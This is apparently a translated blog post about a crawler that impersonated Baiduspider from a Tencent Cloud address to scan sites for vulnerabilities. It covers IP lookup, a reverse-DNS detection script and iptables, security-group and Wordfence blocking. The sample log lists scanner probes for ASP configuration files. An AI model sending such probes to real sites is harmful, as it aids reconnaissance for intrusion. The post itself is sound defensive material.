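Yesterday, while going through the spider history, Naiba noticed that on the 20th Baiduspider had frantically crawled resources that do not exist on my site. It seemed odd at the time, but I did not look into it.
Checking the spider records again just now, I saw that Baidu had hardly visited today, which was odd, so I looked up yesterday's spider IP on a whim and found that it belongs to Tencent Cloud, not Baidu. In other words, someone is using a Tencent Cloud machine to impersonate Baiduspider and scan websites across the internet for exploitable vulnerabilities.
The crawl records of the fake Baiduspider are as follows: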
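The lookup result for this IP is as follows:
Current IP: 118.24.24.40
Location: Chengdu, Sichuan, China
Owner/ISP: tencent.com / China Telecom / China Unicom / China Mobile
Time zone: Asia/Shanghai UTC+8
Region center coordinates: 30.659462, 104.065735
Ports/protocols: This IP has 1 open port; 1 protocol identified.
Threat intelligence: bot, botnet, malware, network attack
So this IP needs to be blocked.
148.70.115.40 is also a malicious crawler.
119.187.243.126 is also a crawler impersonating Baiduspider.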
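The manual check above (looking up who owns the IP) can be automated with forward-confirmed reverse DNS, since Baidu states that genuine Baiduspider addresses reverse-resolve to hostnames under *.baidu.com or *.baidu.jp. The following Python is an added example, not code from the original post; it parses the log layout this page uses, and the sample log lines, DNS answers and function names are constructed for illustration.

```python
import re
import socket

# Line layout of the spider log on this page: date time client-ip path user-agent
LINE_RE = re.compile(r"^(\S+ \S+) (\d{1,3}(?:\.\d{1,3}){3}) (\S+) (.*)$")
BAIDU_SUFFIXES = (".baidu.com", ".baidu.jp")  # PTR suffixes Baidu documents for Baiduspider
UA = "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
# Constructed sample: first address is from this page, the others are documentation ranges.
SAMPLE_LOG = [
    f"2019-06-20 22:11:16 118.24.24.40 /md5.asp {UA}",
    f"2019-06-20 22:11:13 118.24.24.40 /config/AspCms_Config.asp {UA}",
    f"2019-06-20 22:12:40 203.0.113.7 /feed {UA}",
    f"2019-06-20 22:12:41 198.51.100.9 /index.php {UA}",
]
# Constructed DNS answers (PTR name, forward A records) so the example runs offline.
SAMPLE_DNS = {
    "203.0.113.7": ("baiduspider-203-0-113-7.crawl.baidu.com", ["203.0.113.7"]),
    "198.51.100.9": ("spider.baidu.com", ["192.0.2.1"]),  # forged PTR, forward lookup disagrees
}
sample_resolver = lambda ip: SAMPLE_DNS.get(ip, (None, []))

def system_resolver(ip):
    """Return (PTR hostname, forward-resolved IPv4 list) from the system resolver."""
    try:
        host = socket.gethostbyaddr(ip)[0]
        return host, socket.gethostbyname_ex(host)[2]
    except OSError:  # covers socket.herror / socket.gaierror (no PTR, NXDOMAIN)
        return None, []

def is_real_baiduspider(ip, resolver=system_resolver):
    """Forward-confirmed reverse DNS: PTR under a Baidu suffix AND it resolves back to ip."""
    host, forward_ips = resolver(ip)
    named_ok = bool(host) and host.lower().rstrip(".").endswith(BAIDU_SUFFIXES)
    return named_ok and ip in forward_ips

def fake_baiduspiders(log_lines, resolver=system_resolver):
    """Return {ip: hits} for clients whose UA claims Baiduspider but fail the DNS check."""
    verdicts, fakes = {}, {}
    for line in log_lines:
        m = LINE_RE.match(line.strip())
        if m and "baiduspider" in m.group(4).lower():
            ip = m.group(2)
            if ip not in verdicts:  # resolve each address only once
                verdicts[ip] = is_real_baiduspider(ip, resolver)
            if not verdicts[ip]:
                fakes[ip] = fakes.get(ip, 0) + 1
    return fakes

if __name__ == "__main__":
    print(fake_baiduspiders(SAMPLE_LOG, sample_resolver))
```

Called without a resolver argument, the functions use live DNS, so the same check runs unchanged against a real log file.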
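Blocking this IP on Tencent Cloud
Tencent Cloud comes with security groups built in, so there is no need to use the VPS's own firewall to block it.
Log in to the Tencent Cloud console, find your VPS instance, and switch to the Security Groups tab.
Under Inbound Rules, click the Add Rule button.
Then fill in the rule as shown in the image above and save it.
Blocking on other servers
If your server has no security-group feature, you can use the server's own iptables firewall to block this IP.
The iptables rule is as follows: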
iptables -I INPUT -s 118.24.24.40 -j DROP
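Blocking with a plugin
If you are not comfortable with VPS commands, you can also block it directly with a firewall plugin, such as Wordfence, which Naiba has installed (see "4 malware scanning plugins officially recommended by WordPress").
Go to the Blocking options, add a rule for the IP to block, and save. The method is shown in the image below: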